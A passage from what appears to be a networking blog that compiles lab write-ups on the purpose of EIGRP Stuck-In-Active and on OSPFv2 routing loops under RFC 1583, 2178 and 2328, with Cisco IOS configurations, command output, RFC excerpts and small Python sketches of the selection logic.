In such a setup there is absolutely no way SIA would be needed. Let’s imagine that R3 stops sending EIGRP packets for some reason and 1.1.1.1/32 on R1 goes down:

  1. R1 would send a Query for 1.1.1.1/32 to R2;
  2. R2 would send a Query for 1.1.1.1/32 to R3, however, it will never get a Reply;
  3. There would be a few unsuccessful EIGRP retransmits from R2 towards R3;
  4. Either Holddown timer expires (15s by default) or number of retransmits reaches 16 (only Cisco knows how long);
  5. R2 tears down neighbourship with R3 and sends Reply back to R1;
  6. Active timer on R1 never comes even close to expiration (3 minutes) so the 1.1.1.1/32 in Active state is removed.

Remember, however, that EIGRP was designed a really long time ago, when serial links were ubiquitous. The most important feature of these links for this discussion is their relatively long distance and, as a result, high delay. Although serial links are being actively replaced, a similar kind of connection is still around: radio links. Consider the following setup:

The only non-default thing is the serial link using Frame-Relay for encapsulation.

R1#sho run | s interface|router
interface Loopback0
 ip address 1.1.1.1 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.12.1 255.255.255.0
interface FastEthernet0/1
 ip address 192.168.14.1 255.255.255.0
router eigrp 1
 network 0.0.0.0
R2#show run | section interface|router
interface Loopback0
 ip address 2.2.2.2 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.12.2 255.255.255.0
interface Serial4/0
 ip address 192.168.23.2 255.255.255.0
 encapsulation frame-relay
 no keepalive
 frame-relay interface-dlci 100
router eigrp 1
 network 0.0.0.0
R3#show run | section interface|router
interface Loopback0
 ip address 3.3.3.3 255.255.255.255
interface Serial4/0
 ip address 192.168.23.3 255.255.255.0
 encapsulation frame-relay
 no keepalive
 frame-relay interface-dlci 100
router eigrp 1
 network 0.0.0.0

Let’s try to run the scenario without SIA involved. The feature was introduced in the 12.1(5) release, so any 12.0 software should do. Although we cannot drop Queries specifically, we can discard all unicast packets, which achieves the goal: Queries are dropped while Hellos are still accepted. As a result, R2 would consider R3 to have failed based on the Active timer (180 seconds by default) and not on the Holddown timer (also 180 seconds by default on a low-speed NBMA link such as this one). Although it looks like a contrived setup at first glance, I suggest holding on to it for some time.

R3#show ip access-lists
Extended IP access list NOUNICAST
    10 permit ip any 224.0.0.0 15.255.255.255
    20 deny ip any any
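
To see why this ACL keeps the neighbourship alive while starving the Query, here is a small Python sketch of the match logic. The wildcard mask 15.255.255.255 on 224.0.0.0 is the same as 224.0.0.0/4; the function name is hypothetical, and the ACL is modelled only on the destination address, which is all this particular list looks at.

```python
import ipaddress

# permit ip any 224.0.0.0 15.255.255.255  ->  destination within 224.0.0.0/4
MULTICAST = ipaddress.ip_network("224.0.0.0/4")

def nounicast_permits(destination):
    """Return True if the NOUNICAST ACL would permit a packet to `destination`."""
    # Line 10 permits multicast destinations, line 20 denies everything else.
    return ipaddress.ip_address(destination) in MULTICAST

print(nounicast_permits("224.0.0.10"))    # EIGRP multicast Hello -> True
print(nounicast_permits("192.168.23.3"))  # unicast EIGRP packet to R3 -> False
```

Hellos are sent to 224.0.0.10 and get through, so the Holddown timer on R3 keeps being refreshed, while any EIGRP packet addressed to 192.168.23.3 directly is dropped.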

Now, let’s bring down 1.1.1.1/32 and activate the ACL on R3:

R3(config)#interface s4/0
R3(config-if)#ip access-group NOUNICAST in
R1(config)#interface lo0
R1(config-if)#sh

Now R1 considers the route to be in Active state.

R1# show ip eigrp topology active
IP-EIGRP Topology Table for AS(1)/ID(1.1.1.1)

Codes: P - Passive, A - Active, U - Update, Q - Query, R - Reply,
       r - Reply status

A 1.1.1.1/32, 1 successors, FD is Infinity
    1 replies, active 00:00:07, query-origin: Local origin
      Remaining replies:
         via 192.168.12.2, r, FastEthernet0/0

After 3 minutes R1 should flush the route because by that moment it has received no Reply from R2 as there was no response from R3. However, this is not the case:

R1#show ip eigrp topology active 
IP-EIGRP Topology Table for AS(1)/ID(1.1.1.1)

Codes: P - Passive, A - Active, U - Update, Q - Query, R - Reply,
       r - Reply status

A 1.1.1.1/32, 1 successors, FD is Inaccessible
    1 replies, active 00:03:05, query-origin: Local origin
         via Connected (Infinity/Infinity), Loopback0
    Remaining replies:
         via 192.168.12.2, r, FastEthernet0/0
R1#show ip eigrp topology active 
IP-EIGRP Topology Table for AS(1)/ID(1.1.1.1)

Is there anything wrong with the configuration? I don’t think so. However, let’s get back to the failure condition based on the Active timer instead of the Holddown timer. Imagine that there is a bunch of other routers between R1 and R2, all using serial links and thus contributing to the overall delay. Could the gap between 1.1.1.1/32 going down (which starts the Active timer) and the last Hello from R3 arriving (which refreshes the Holddown timer) be small enough to be covered completely by that delay? Definitely so:

  1. Although R2 might terminate neighbourship with R3 after 180 seconds, there is still a propagation delay for that event to reach R1.
  2. With a bit of “luck”, the last Hello and the disappearance of 1.1.1.1/32 would line up.
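
The race described in the two points above can be written down as a tiny timing model. It is a simplification of my own: a single one-way delay between R1 and R2 in both directions, no retransmissions, and all times in seconds relative to an arbitrary zero.

```python
def reply_arrives_in_time(route_down_at, last_hello_at, one_way_delay,
                          hold_timer=180.0, active_timer=180.0):
    """True if R2's Reply reaches R1 before R1's Active timer expires."""
    query_reaches_r2_at = route_down_at + one_way_delay
    neighbour_declared_dead_at = last_hello_at + hold_timer
    # R2 can reply only after it has the Query and has given up on R3.
    reply_sent_at = max(query_reaches_r2_at, neighbour_declared_dead_at)
    reply_reaches_r1_at = reply_sent_at + one_way_delay
    active_timer_expires_at = route_down_at + active_timer
    return reply_reaches_r1_at <= active_timer_expires_at

# Last Hello and route loss line up: any propagation delay loses the race.
print(reply_arrives_in_time(route_down_at=0, last_hello_at=0, one_way_delay=0.5))    # False
# The last Hello was 10 seconds earlier: R2 gives up on R3 in time.
print(reply_arrives_in_time(route_down_at=0, last_hello_at=-10, one_way_delay=0.5))  # True
# A 15-second Holddown timer leaves plenty of room.
print(reply_arrives_in_time(0, 0, 0.5, hold_timer=15.0))                             # True
```

With equal timers the margin is zero, so the outcome depends entirely on the delay, which is exactly the dependency SIA is meant to remove.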

As soon as R2 prepares the Reply to be sent back to R1, Active timer on R1 expires and R1 resets the neighbourship with R2, at least according to the description of DUAL. As you could imagine, such a behaviour causes chain flapping of EIGRP neighbourships all around the network, just because there are high-delay links and a rogue malfunctioning router.

So why did we filter only unicast packets instead of dropping all EIGRP datagrams? Well, dropping everything would have required me to initiate the events at the same time, right after the last Hello from R3 was received. Although that is possible with some automation, using the Active timer instead removed the delay between my brain and the keyboard from the equation completely, while still providing us with the same result.

However, that’s not what we observed during the test. I’ll have to speculate a little bit here, as I don’t have a strict explanation for it, only a hypothesis.

  1. It’s possible to alleviate the problem by increasing the gap between default values of Active and Holddown timers. However, feasibility of such a method really depends on the total delay between the routers so I’d consider it to be a workaround. It seems that IOS 12.0 implements exactly this behaviour; version 11 could have provided different results but I could not find the image.
  2. The proper solution to the problem at hand is SIA. The idea is simple: separate prefix availability check (Query) from neighbour availability check (SIA-Query). Such an approach incurs no tangible dependency on total delay compared to timer tuning. Besides, it is generally a good idea to separate functions and not to overload them extensively.

Does it really matter in the modern world, especially since SIA cannot be disabled? Most likely not, to be honest, unless you run a very outdated IOS version (SIA would be the least of your concerns in such a case though). Understanding the reason for a feature to be implemented makes me feel good – so maybe such a knowledge would make someone feel good as well.

Kudos for review: Anastasiia Kuraleva


OSPFv2: extra routing loops

Lately I’ve covered one of the reasons for RFC 2328 to emerge. However, that’s not the only scenario when OSPF calculations, compliant with RFC 1583, can lead to routing loops. If you’ve peeked at RFC 2178, then you probably know what’s coming next.

Besides fixing the metric for aggregate routes, RFC 2328 also changed the best path selection process for external routes.

Otherwise, compare the cost of this new AS external path to the ones present in the table. Type 1 external paths are always shorter than type 2 external paths. Type 1 external paths are compared by looking at the sum of the distance to the forwarding address and the advertised type 1 metric (X+Y). Type 2 external paths are compared by looking at the advertised type 2 metrics, and then if necessary, the distance to the forwarding addresses.

RFC 1583, section 16.4

Compare the AS external path described by the LSA with the existing paths in N’s routing table entry, as follows. If the new path is preferred, it replaces the present paths in N’s routing table entry. If the new path is of equal preference, it is added to N’s routing table entry’s list of paths.

(a) Intra-area and inter-area paths are always preferred over AS external paths.

(b) Type 1 external paths are always preferred over type 2 external paths. When all paths are type 2 external paths, the paths with the smallest advertised type 2 metric are always preferred.

(c) If the new AS external path is still indistinguishable from the current paths in the N’s routing table entry, and RFC1583Compatibility is set to “disabled”, select the preferred paths based on the intra-AS paths to the ASBR/forwarding addresses, as specified in Section 16.4.1.

(d) If the new AS external path is still indistinguishable from the current paths in the N’s routing table entry, select the preferred path based on a least cost comparison. Type 1 external paths are compared by looking at the sum of the distance to the forwarding address and the advertised type 1 metric (X+Y). Type 2 external paths advertising equal type 2 metrics are compared by looking at the distance to the forwarding addresses.

RFC 2328, section 16.4

  • Intra-area paths using non-backbone areas are always the most preferred.
  • The other paths, intra-area backbone paths and inter-area paths, are of equal preference.

RFC 2328, section 16.4.1

Long story short:

  1. RFC 1583 compares the same route from different ASBRs solely based on metric.
  2. RFC 2328 prefers ASBRs reachable via intra-area paths through non-backbone areas over the rest; only if there is a tie does it compare the costs to the ASBRs.

So the selection decisions of interest are:

  1. preference for intra-area paths through non-backbone areas;
  2. no distinction between intra-area backbone and inter-area paths to ASBRs.
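
The difference between the two RFCs can be sketched in a few lines of Python. The sketch covers only the case where the external routes are otherwise indistinguishable (same type, same advertised metric); the AsbrPath class, the function names and the costs are illustrative assumptions and not taken from the lab.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class AsbrPath:
    asbr: str
    path_type: str  # "intra" or "inter"
    area: int       # area the path belongs to (0 = backbone)
    cost: int       # cost to the ASBR / forwarding address

def rfc1583_best(paths):
    """RFC 1583: the lowest cost to the ASBR wins, nothing else matters."""
    return min(paths, key=lambda p: p.cost)

def rfc2328_best(paths):
    """RFC 2328 (16.4.1): intra-area non-backbone paths first, then cost."""
    def preferred(p):
        return p.path_type == "intra" and p.area != 0
    # False sorts before True, hence 'not preferred' as the first key.
    return min(paths, key=lambda p: (not preferred(p), p.cost))

# Hypothetical view from an ABR attached to both area 0 and area 1.
paths = [
    AsbrPath(asbr="2.2.2.2", path_type="intra", area=0, cost=10),
    AsbrPath(asbr="6.6.6.6", path_type="intra", area=1, cost=100),
]
print(rfc1583_best(paths).asbr)  # 2.2.2.2
print(rfc2328_best(paths).asbr)  # 6.6.6.6
```

Two routers that disagree like this about the same destination are all it takes to bounce a packet back and forth, which is where the loops in this post come from.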

Consider the following setup:

The ASBRs peer with BGP node to exchange a few prefixes: receive 1.1.1.1/32 and announce 3.3.3.3/32. ASBRs also announce a default route into OSPF domain. Two links have non-default costs, they are marked in red. Apart from that, no special configuration is present, everything is left by default.

BGP#sho run | section interface|router
interface Loopback0
 ip address 1.1.1.1 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.16.1 255.255.255.0
interface FastEthernet0/1
 ip address 192.168.12.1 255.255.255.0
router bgp 1
 no bgp default ipv4-unicast
 neighbor 192.168.12.2 remote-as 100
 neighbor 192.168.16.6 remote-as 100
 !
 address-family ipv4
  network 1.1.1.1 mask 255.255.255.255
  neighbor 192.168.12.2 activate
  neighbor 192.168.16.6 activate
ASBR1#sho run | s interface|router
interface Loopback0
 ip address 2.2.2.2 255.255.255.255
 ip ospf 1 area 0
interface FastEthernet0/0
 ip address 192.168.23.2 255.255.255.0
 ip ospf 1 area 0
 ip ospf cost 10
interface FastEthernet0/1
 ip address 192.168.12.2 255.255.255.0
router ospf 1
 default-information originate always
router bgp 100
 no bgp default ipv4-unicast
 neighbor 192.168.12.1 remote-as 1
 !
 address-family ipv4
  network 3.3.3.3 mask 255.255.255.255
  neighbor 192.168.12.1 activate
ASBR2#sho run | section interface|router
interface Loopback0
 ip address 6.6.6.6 255.255.255.255
 ip ospf 1 area 1
interface FastEthernet0/0
 ip address 192.168.16.6 255.255.255.0
interface FastEthernet0/1
 ip address 192.168.56.6 255.255.255.0
 ip ospf 1 area 1
interface FastEthernet1/0
 ip address 192.168.46.6 255.255.255.0
 ip ospf 1 area 1
 ip ospf cost 100
router ospf 1
 default-information originate always
router bgp 100
 no bgp default ipv4-unicast
 neighbor 192.168.16.1 remote-as 1
 !
 address-family ipv4
  network 3.3.3.3 mask 255.255.255.255
  neighbor 192.168.16.1 activate
ABR1#sho run | section interface|router
interface Loopback0
 ip address 4.4.4.4 255.255.255.255
 ip ospf 1 area 0
interface FastEthernet0/0
 ip address 192.168.45.4 255.255.255.0
 ip ospf 1 area 0
interface FastEthernet0/1
 ip address 192.168.34.4 255.255.255.0
 ip ospf 1 area 0
interface FastEthernet1/0
 ip address 192.168.46.4 255.255.255.0
 ip ospf 1 area 1
 ip ospf cost 100
router ospf 1
ABR2#sho run | section interface|router
interface Loopback0
 ip address 5.5.5.5 255.255.255.255
 ip ospf 1 area 0
interface FastEthernet0/0
 ip address 192.168.45.5 255.255.255.0
 ip ospf 1 area 0
interface FastEthernet0/1
 ip address 192.168.56.5 255.255.255.0
 ip ospf 1 area 1
router ospf 1
R#sho run | section interface|router
interface Loopback0
 ip address 3.3.3.3 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.23.3 255.255.255.0
 ip ospf cost 10
interface FastEthernet0/1
 ip address 192.168.34.3 255.255.255.0
router ospf 1
 network 0.0.0.0 255.255.255.255 area 0

The configuration looks pretty innocent: BGP should be able to reach 3.3.3.3/32 using 1.1.1.1 as the source address.

BGP#ping 3.3.3.3 so lo 0
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 3.3.3.3, timeout is 2 seconds:
Packet sent with a source address of 1.1.1.1 
.....
Success rate is 0 percent (0/5)

However, that’s not the case. Maybe some routes are missing along the way?

BGP#traceroute 3.3.3.3 source 1.1.1.1
Type escape sequence to abort.
Tracing the route to 3.3.3.3
VRF info: (vrf in name/id, vrf out name/id)
  1 192.168.16.6 12 msec 24 msec 20 msec
  2 192.168.56.5 56 msec 16 msec 36 msec
  3  *  *  * 
<output omitted>

It seems that ABR1 is dropping the packets. However, that’s not really the case if one runs a traceroute from R:

R#traceroute 1.1.1.1 source 3.3.3.3
Type escape sequence to abort.
Tracing the route to 1.1.1.1
VRF info: (vrf in name/id, vrf out name/id)
  1 192.168.34.4 16 msec 16 msec 20 msec
  2 192.168.34.3 20 msec 24 msec 16 msec
  3 192.168.34.4 32 msec 36 msec 40 msec
  4 192.168.34.3 36 msec 40 msec 36 msec
<you get the idea>

According to the topology, R selects a proper default route towards ASBR2:

R#sho ip ospf border-routers    

            OSPF Router with ID (3.3.3.3) (Process ID 1)


		Base Topology (MTID 0)

Internal Router Routing Table
Codes: i - Intra-area route, I - Inter-area route

i 4.4.4.4 [1] via 192.168.34.4, FastEthernet0/1, ABR, Area 0, SPF 12
i 5.5.5.5 [2] via 192.168.34.4, FastEthernet0/1, ABR, Area 0, SPF 12
i 2.2.2.2 [10] via 192.168.23.2, FastEthernet0/0, ASBR, Area 0, SPF 12
I 6.6.6.6 [3] via 192.168.34.4, FastEthernet0/1, ASBR, Area 0, SPF 12
I 6.6.6.6 [101] via 192.168.34.4, FastEthernet0/1, ASBR, Area 0, SPF 12

ABR1, though, goes haywire:

ABR1#sho ip ospf border-routers 

            OSPF Router with ID (4.4.4.4) (Process ID 1)


		Base Topology (MTID 0)

Internal Router Routing Table
Codes: i - Intra-area route, I - Inter-area route

i 5.5.5.5 [101] via 192.168.46.6, FastEthernet1/0, ABR, Area 1, SPF 8
i 5.5.5.5 [1] via 192.168.45.5, FastEthernet0/0, ABR, Area 0, SPF 9
i 2.2.2.2 [11] via 192.168.34.3, FastEthernet0/1, ASBR, Area 0, SPF 9
i 6.6.6.6 [100] via 192.168.46.6, FastEthernet1/0, ASBR, Area 1, SPF 8

Take a very close look at the cost towards ASBR2 from both points of view. R selects the path via ABR2 with a cost of 3; ABR1, however, knows nothing about the path through ABR2 and sees only a cost of 100. The reason for this behaviour is relatively simple: ASBR2 and ABR1 are in the same area, so ABR1 prefers the intra-area route. As a consequence, the preferred ASBR changes once again for a transit packet, and that results in a routing loop.

Let’s switch over to RFC 2328 on all the routers in the domain:

R(config)#router ospf 1
R(config-router)#no compatible rfc1583
R#traceroute 1.1.1.1 so 3.3.3.3
Type escape sequence to abort.
Tracing the route to 1.1.1.1
VRF info: (vrf in name/id, vrf out name/id)
  1 192.168.34.4 20 msec 32 msec 12 msec
  2 192.168.46.6 12 msec 20 msec 8 msec
  3 192.168.16.1 4 msec 28 msec 16 msec
ABR1#sho ip ro os                              
<output omitted>
Gateway of last resort is 192.168.46.6 to network 0.0.0.0

O*E2  0.0.0.0/0 [110/1] via 192.168.46.6, 00:02:00, FastEthernet0/1
<output omitted>

Although the loop is defeated at last, we still face suboptimal routing. R still considers the routes towards ASBR1 (backbone intra-area) and ASBR2 (inter-area) to be of equal preference, so it proceeds to compare their costs. Wouldn’t it be better to just prefer the backbone route over the inter-area one? This was exactly the idea in RFC 2178:

  • Intra-area paths using non-backbone areas are always the most preferred.
  • Otherwise, intra-area backbone paths are preferred.
  • Inter-area paths are the least preferred.
RFC 2178, section 16.4.1

However, there was a strong reason to move away to the current selection process:

There is still the possibility of a routing loop in RFC 2178 when both

  1. virtual links are in use and
  2. the same external route is being imported by multiple ASBRs, each of which is in a separate area.

To fix this problem, Section 16.4.1 has been revised. To choose the correct ASBR/forwarding address, intra-area paths through non-backbone areas are always preferred. However, intra-area paths through the backbone area (Area 0) and inter-area paths are now of equal preference, and must be compared solely based on cost.

The reasoning behind this change is as follows. When virtual links are in use, an intra-area backbone path for one router can turn into an inter-area path in a router several hops closer to the destination. Hence, intra-area backbone paths and inter-area paths must be of equal preference. We can safely compare their costs, preferring the path with the smallest cost, due to the calculations in Section 16.3.

RFC 2328, section G.2
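
To see the three rules side by side, here is a minimal Python sketch that applies each of them to the two routers from the lab above. The class and function names are made up for illustration, the costs come from the border-router outputs shown earlier, and the RFC 1583 rule is reduced to a plain cost comparison, which is a simplifying assumption of this sketch rather than a quote from the standard.

```python
from dataclasses import dataclass

BACKBONE = 0


@dataclass(frozen=True)
class AsbrPath:
    asbr: str
    kind: str   # "intra" or "inter"
    area: int   # area the path is associated with
    cost: int


def preference(path, rule):
    """Lower value means more preferred; cost only breaks ties within a class."""
    non_backbone_intra = path.kind == "intra" and path.area != BACKBONE
    backbone_intra = path.kind == "intra" and path.area == BACKBONE
    if rule == "rfc1583":
        return 0  # assumption: every path is in one class, cost decides
    if rule == "rfc2178":
        return 0 if non_backbone_intra else 1 if backbone_intra else 2
    if rule == "rfc2328":
        return 0 if non_backbone_intra else 1
    raise ValueError(f"unknown rule: {rule}")


def best_asbr(paths, rule):
    return min(paths, key=lambda p: (preference(p, rule), p.cost)).asbr


# Costs as seen in "show ip ospf border-routers" on R and ABR1.
R_VIEW = [AsbrPath("ASBR1", "intra", 0, 10), AsbrPath("ASBR2", "inter", 0, 3)]
ABR1_VIEW = [AsbrPath("ASBR1", "intra", 0, 11), AsbrPath("ASBR2", "intra", 1, 100)]

for rule in ("rfc1583", "rfc2178", "rfc2328"):
    print(rule, "R ->", best_asbr(R_VIEW, rule), "| ABR1 ->", best_asbr(ABR1_VIEW, rule))
```

With these inputs the cost-only rule makes R pick ASBR2 while ABR1 picks ASBR1, which is the loop. The RFC 2178 rule sends R to ASBR1, and the RFC 2328 rule makes both routers agree on ASBR2.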

As far as I know, there is no support specifically for RFC 2178 among relevant OSPF implementations. Luckily, vivid imagination helps in such cases. Consider the following topology:

RFC 2178 compliance:

  1. R1 compares the inter-area ASBR1 with the intra-area backbone ASBR2 (via virtual-link).
  2. Backbone ASBR2 is better so R1 sends a packet to it.
  3. R2 compares inter-area ASBR1 and ASBR2.
  4. ASBR1 is better, so R2 sends packet to it – back to R1.

RFC 2328 compliance:

  1. R1 compares the inter-area ASBR1 with the intra-area backbone ASBR2 and considers them equal.
  2. R1 compares costs towards ASBR1 (2) and ASBR2 (13).
  3. ASBR1 is better so R1 sends a packet to it via ABR2.

The source of evil for external routes in OSPF is a change of ASBR preference along the path. RFC 2328 eliminates such changes at last, although at the cost of optimal routing. The RFC authors evidently reckon that an inefficient path is better than a completely broken one.

OSPF is a rather rigid IGP with a lot of inner complexities. Although it’s possible to tune this protocol to some extent, one should have a very deep understanding of repercussions to avoid sophisticated troubleshooting. In the end, KISS is very much applicable to OSPF. If you require a more flexible protocol, the choice is obvious: either you need BGP or a better network architect.

Kudos for review: Anastasiia Kuraleva

Follow on Telegram, LinkedIn

OSPFv2: there and back again

There are quite a few versions of OSPF out there in the wild. However, it might be uncommon knowledge that several RFCs exist just for OSPFv2, although most implementations conform to either RFC 1583 or RFC 2328. These two RFCs are not compatible with each other; there is even an article that vividly describes the mayhem that different versions could cause in a network. So why did the IETF bother to create a second revision of the protocol? The reason is simple: RFC 1583 contains inherent flaws in the algorithm that could cause loops in the network.

One of the significant differences between the two versions is how an ABR calculates the metric for aggregated routes.

When the range’s status indicates Advertise, a Type 3 advertisement is generated with Link State ID equal to the range’s address (if necessary, the Link State ID can also have one or more of the range’s “host” bits set; see Appendix F for details) and cost equal to the smallest cost of any of the component networks.


RFC 1583, section 12.4.3

When the range’s status indicates Advertise, a Type 3 summary-LSA is generated with Link State ID equal to the range’s address (if necessary, the Link State ID can also have one or more of the range’s “host” bits set; see Appendix E for details) and cost equal to the largest cost of any of the component networks.

RFC 2328, section 12.4.3

For a very long time this change looked to me like a forklift upgrade made for the sake of some vague greater good. However, there is a pretty good section in RFC 2178 about the true reasons for such a drastic change:

There are two manifestations of this problem. The first, discovered by Dennis Ferguson, occurs when an aggregated forwarding address is in use. In this case, the desirability of the forwarding address can change for the worse as a packet crosses an area aggregation boundary on the way to the forwarding address, which in turn can cause the preference of AS-external-LSAs to change, resulting in a routing loop.

Feels cryptic? Welcome to the club. Let’s build up a scenario that illustrates the problem.

In areas 1 and 2 the external-facing interfaces are included in OSPF in order to populate the Forwarding Address field. The ABRs summarize these ranges into area 0. Let’s recap the process of path selection for external routes in RFC 1583:

  1. intra-AS paths are better than external paths;
  2. Type-1 (E1) paths are better than Type-2 (E2) paths;
  3. lower metric wins;
  4. E2 only: lower metric towards Forwarding Address wins.
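
The external part of this recap (steps 2 to 4) boils down to a sort key. The sketch below is one way to express it in Python; `ExternalPath`, `selection_key` and the sample values are hypothetical and only serve as an illustration. Step 1 is assumed to have been applied already, so only external candidates are compared.

```python
from typing import NamedTuple


class ExternalPath(NamedTuple):
    forwarding_address: str
    metric_type: int      # 1 for E1, 2 for E2
    metric: int           # metric carried in the AS-external-LSA
    forward_metric: int   # internal cost towards the Forwarding Address


def selection_key(path):
    """Smaller tuples win, mirroring steps 2 to 4 of the list above."""
    if path.metric_type == 1:
        # E1: the internal cost is added to the external metric.
        return (1, path.metric + path.forward_metric, 0)
    # E2: the external metric is compared first, the internal cost breaks ties.
    return (2, path.metric, path.forward_metric)


def best_external(paths):
    return min(paths, key=selection_key)


# Illustrative candidates: two E2 routes with the same external metric.
candidates = [
    ExternalPath("10.1.46.6", 2, 1, 12),
    ExternalPath("10.2.56.6", 2, 1, 1002),
]
print(best_external(candidates).forwarding_address)
```

Since both candidates are E2 with an equal metric, the decision falls through to the cost towards the Forwarding Address, which is exactly the field that aggregation distorts.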

Here’s the config for all routers in this setup:

R1#show run | section interface|router
interface Loopback0
 ip address 1.1.1.1 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.12.1 255.255.255.0
interface FastEthernet0/1
 ip address 192.168.13.1 255.255.255.0
router ospf 1
 network 0.0.0.0 255.255.255.255 area 0
ABR1#sho run | section interface|router
interface Loopback0
 ip address 2.2.2.2 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.12.2 255.255.255.0
interface FastEthernet0/1
 ip address 192.168.24.2 255.255.255.0
 ip ospf 1 area 1
router ospf 1
 area 1 range 10.1.0.0 255.255.0.0
 network 0.0.0.0 255.255.255.255 area 0
ABR2#sho run | section interface|router
interface Loopback0
 ip address 3.3.3.3 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.35.3 255.255.255.0
 ip ospf 1 area 2
interface FastEthernet0/1
 ip address 192.168.13.3 255.255.255.0
router ospf 1
 area 2 range 10.2.0.0 255.255.0.0
 network 0.0.0.0 255.255.255.255 area 0
ASBR1#sho run | section interface|router
interface Loopback0
 ip address 4.4.4.4 255.255.255.255
interface FastEthernet0/0
 ip address 10.1.46.4 255.255.255.0
 ip ospf cost 1000
interface FastEthernet0/1
 ip address 192.168.24.4 255.255.255.0
router ospf 1
 router-id 4.4.4.4
 redistribute bgp 1 subnets
 network 0.0.0.0 255.255.255.255 area 1
router bgp 1
 bgp router-id 4.4.4.4
 no bgp default ipv4-unicast
 neighbor 10.1.46.6 remote-as 6
 !
 address-family ipv4
  redistribute ospf 1
  neighbor 10.1.46.6 activate
ASBR2#sho run | section interface|router
interface Loopback0
 ip address 5.5.5.5 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.35.5 255.255.255.0
interface FastEthernet0/1
 ip address 10.2.56.5 255.255.255.0
 ip ospf cost 10
router ospf 1
 router-id 5.5.5.5
 redistribute bgp 1 subnets
 network 0.0.0.0 255.255.255.255 area 2
router bgp 1
 bgp router-id 5.5.5.5
 no bgp default ipv4-unicast
 neighbor 10.2.56.6 remote-as 6
 !
 address-family ipv4
  redistribute ospf 1
  neighbor 10.2.56.6 activate
BGP#sho run | s interface|router
interface Loopback0
 ip address 6.6.6.6 255.255.255.255
interface FastEthernet0/0
 ip address 10.1.46.6 255.255.255.0
interface FastEthernet0/1
 ip address 10.2.56.6 255.255.255.0
router bgp 6
 no bgp default ipv4-unicast
 neighbor 10.1.46.4 remote-as 1
 neighbor 10.2.56.5 remote-as 1
 !
 address-family ipv4
  network 6.6.6.6 mask 255.255.255.255
  neighbor 10.1.46.4 activate
  neighbor 10.2.56.5 activate

Let’s verify that R1 has connectivity to 6.6.6.6, the loopback of the BGP router:

R1#sho ip route 6.6.6.6
Routing entry for 6.6.6.6/32
  Known via "ospf 1", distance 110, metric 1
  Tag 6, type extern 2, forward metric 12
  Last update from 192.168.12.2 on FastEthernet0/0, 00:04:10 ago
  Routing Descriptor Blocks:
  * 192.168.12.2, from 4.4.4.4, 00:04:13 ago, via FastEthernet0/0
      Route metric is 1, traffic share count is 1
      Route tag 6
R1#ping 6.6.6.6 source loopback 0
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 6.6.6.6, timeout is 2 seconds:
Packet sent with a source address of 1.1.1.1 
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 12/35/56 ms

Since both routes are E2, R1 selects the best one based on the cost towards Forwarding Address:

R1#sho ip ospf database external | include Link State ID|Network Mask|Forward Address|LS Type
  LS Type: AS External Link
  Link State ID: 6.6.6.6 (External Network Number )
  Network Mask: /32
	Forward Address: 10.1.46.6
  LS Type: AS External Link
  Link State ID: 6.6.6.6 (External Network Number )
  Network Mask: /32
	Forward Address: 10.2.56.6
R1#
R1#show ip route 10.2.56.6
Routing entry for 10.2.0.0/16
  Known via "ospf 1", distance 110, metric 1002, type inter area
  Last update from 192.168.13.3 on FastEthernet0/1, 00:01:10 ago
  Routing Descriptor Blocks:
  * 192.168.13.3, from 3.3.3.3, 00:01:10 ago, via FastEthernet0/1
      Route metric is 1002, traffic share count is 1
R1#show ip route 10.1.46.6
Routing entry for 10.1.0.0/16
  Known via "ospf 1", distance 110, metric 12, type inter area
  Last update from 192.168.12.2 on FastEthernet0/0, 00:10:25 ago
  Routing Descriptor Blocks:
  * 192.168.12.2, from 2.2.2.2, 00:10:25 ago, via FastEthernet0/0
      Route metric is 12, traffic share count is 1

There is only one tiny addition pending: let’s configure a loopback on ASBR2 with an address from 10.2.0.0/16 range:

ASBR2#sho run interface loopback 1
interface Loopback1
 ip address 10.2.2.2 255.255.255.255

An update worthy of an EOBD on Friday:

R1#ping 6.6.6.6 source loopback 0                                                            
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 6.6.6.6, timeout is 2 seconds:
Packet sent with a source address of 1.1.1.1 
.....
Success rate is 0 percent (0/5)

BANG! Network connectivity is lost. Guess what’s happening?..

R1#traceroute 6.6.6.6 source loopback 0
Type escape sequence to abort.
Tracing the route to 6.6.6.6
VRF info: (vrf in name/id, vrf out name/id)
  1 192.168.13.3 28 msec 16 msec 20 msec
  2 192.168.13.1 24 msec 20 msec 20 msec
  3 192.168.13.3 36 msec 40 msec 40 msec
  4 192.168.13.1 40 msec 40 msec 40 msec
<you get the point>

Let’s peek at R1’s point of view on the network:

R1#show ip route 6.6.6.6
Routing entry for 6.6.6.6/32
  Known via "ospf 1", distance 110, metric 1
  Tag 6, type extern 2, forward metric 3
  Last update from 192.168.13.3 on FastEthernet0/1, 00:04:17 ago
  Routing Descriptor Blocks:
  * 192.168.13.3, from 5.5.5.5, 00:04:17 ago, via FastEthernet0/1
      Route metric is 1, traffic share count is 1
      Route tag 6
R1#
R1#show ip ospf database external | include Link State ID|Network Mask|Metric|Forward
  Link State ID: 6.6.6.6 (External Network Number )
  Network Mask: /32
	Metric Type: 2 (Larger than any link state path)
	Metric: 1 
	Forward Address: 10.1.46.6
  Link State ID: 6.6.6.6 (External Network Number )
  Network Mask: /32
	Metric Type: 2 (Larger than any link state path)
	Metric: 1 
	Forward Address: 10.2.56.6
R1#
R1#show ip route 10.1.46.6
Routing entry for 10.1.0.0/16
  Known via "ospf 1", distance 110, metric 12, type inter area
  Last update from 192.168.12.2 on FastEthernet0/0, 00:22:00 ago
  Routing Descriptor Blocks:
  * 192.168.12.2, from 2.2.2.2, 00:22:00 ago, via FastEthernet0/0
      Route metric is 12, traffic share count is 1
R1#
R1#show ip route 10.2.56.6
Routing entry for 10.2.0.0/16
  Known via "ospf 1", distance 110, metric 3, type inter area
  Last update from 192.168.13.3 on FastEthernet0/1, 00:05:51 ago
  Routing Descriptor Blocks:
  * 192.168.13.3, from 3.3.3.3, 00:05:51 ago, via FastEthernet0/1
